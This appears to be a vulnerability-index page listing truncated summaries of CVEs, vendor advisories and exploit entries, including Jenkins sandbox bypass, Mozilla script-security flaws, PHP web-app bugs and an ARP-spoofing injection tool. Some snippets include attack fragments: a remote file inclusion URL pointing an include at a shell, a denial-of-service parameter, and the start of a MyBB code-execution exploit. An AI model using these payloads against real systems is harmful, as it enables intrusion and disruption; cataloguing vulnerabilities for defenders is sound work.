Design/Logic Flaw
The Script Security plugin before 1.18.1 in Jenkins might allow remote attackers to bypass a Groovy sandbox protection mechanism via a plugin that performs (1) direct field access or (2) get/set array operations...
CVE-2016-3102
The Script Security plugin before 1.18.1 in Jenkins might allow remote attackers to bypass a Groovy sandbox protection mechanism via a plugin that performs (1) direct field access or (2) get/set array operations...
CVE-2016-3102
The CVE-2016-3102 issue affects the Jenkins Script Security plugin prior to 1.18.1, where a plugin that performs direct field access or get/set array operations could bypass the Groovy sandbox protection. Affected product: Jenkins Script Security plugin (versions
Fedora Update for jenkins-script-security-plugin FEDORA-2015-5643
The remote host is missing an update for the...
Fedora 21 : jenkins-script-security-plugin-1.13-2.fc21 / groovy-sandbox-1.8-1.fc21 / etc (2015-5637)
Fix CVE-2015-1806 SECURITY-125. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
Fedora Update for jenkins-script-security-plugin FEDORA-2015-5637
The remote host is missing an update for the...
[LANs.py] Capture and inject traffic on LAN
Multithreaded asynchronous packet parsing/injecting arp spoofer. Individually arpspoofs the target box, router and DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans ...
DVWA: learn common PHP vulnerabilities and repair methods - vulnerability warning - the black bar safety net
“Security is a whole, to ensure that security is not to powerful where there is more powerful and that the real weakness of the place where the” -- Kenshin. Judging from many cases of penetration into the internal networks of large enterprises, intruders most often start from the Web to find the...
NICE PHP FAQ Script CSRF Vulnerability
Exploit for PHP platform in category web applications. Exploit Title: NICE PHP FAQ Script CSRF. Author: Jonturk75. Vendor or Software Link: http://www.scripts.com/viewscript/nice-php-faq-script-designer-seo/24292/ Category: webapps. Demo: http://www.nicephpscripts.com/scripts/faqscript/admin Greetz...
Mozilla Foundation Security Advisory 2012-05
Mozilla Foundation Security Advisory 2012-05. Title: Frame scripts calling into untrusted objects bypass security checks. Impact: Critical. Announced: January 31, 2012. Reporter: moz_bug_r_a4. Products: Firefox, Thunderbird, SeaMonkey. Fixed in: Firefox 10.0, Thunderbird 10.0, SeaMonkey 2.7. Description...
Frame scripts calling into untrusted objects bypass security checks — Mozilla
Mozilla security researcher moz_bug_r_a4 reported that frame scripts bypass XPConnect security checks when calling untrusted objects. This allows for cross-site scripting (XSS) attacks through web pages and Firefox extensions. The fix enables the Script Security Manager (SSM) to force security checks on...
LabWiki Multiple Cross-site Scripting (XSS) and Shell Upload Vulnerabilities
LabWiki is prone to multiple cross-site scripting and shell upload vulnerabilities.
Mozilla Firefox and SeaMonkey Java LiveConnect Script Security Bypass Vulnerability
CVE: CVE-2010-3775. Bugtraq ID: 45355. Mozilla Firefox and SeaMonkey are prone to a security-bypass vulnerability. Attackers can exploit this issue to bypass security restrictions and obtain elevated privileges such as the abilities to read local files, launch processes, and create network connection...
Infocus Real Estate Enterprise Edition Script - Authentication Bypass
Authentication bypass in Infocus Real Estate Enterprise Edition script. Vendor: www.instantrankingseo.com Author: Sid3^effects aKa haRi. Description: Infocus Real Estate Enterprise Edition is a complete power packed script with...
TinyButStrong 3.4.0 File Disclosure
Local file include. Script: TinyButStrong version 3.4.0...
MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit
No description provided by source. #!/usr/bin/php <?php error_reporting(E_ALL ^ E_NOTICE); http://www.milw0rm.com/exploits/2012 They corrected not all a lot of SQL requests which use the ipaddress, with $db->escape_string. They don't corrected the function this is a choice ... the bad and they forgot to...
Maian Recipe 1.0 - 'path_to_folder' Remote File Inclusion
Found by Denven. Script: http://www.maianscriptworld.co.uk/freestuff1975recipe.html Google Dork: "Powered by Maian Recipe v1.0". ERROR: classes/classmail.inc.php: include($path_to_folder.'classes/class.phpmailer.php'); RFI: http://www.SITE.com/path/classes/classmail.inc.php?path_to_folder=shell...
Vulnerabilities in scripts from www.wr-script.ru (wr-board 1.4Lite)
1. DoS. The value of the page parameter in index.php is not checked: http://wr-script.host/board/index.php?event=list&id=112420973596&page=-10000000000000000 2. Open mail form. The address to which the message from the board will be sent is passed in the hidden uemail field. Usage example:...
FreeBSD : mozilla -- 'Wrapped' javascript: urls bypass security checks (a81746a1-c2c7-11d9-89f7-02061b08fc24)
A Mozilla Foundation Security Advisory reports: Some security checks intended to prevent script injection were incorrect and could be bypassed by wrapping a javascript: URL in the view-source: pseudo-protocol. Michael Krax demonstrated that a variant of his favicon exploit could still execute...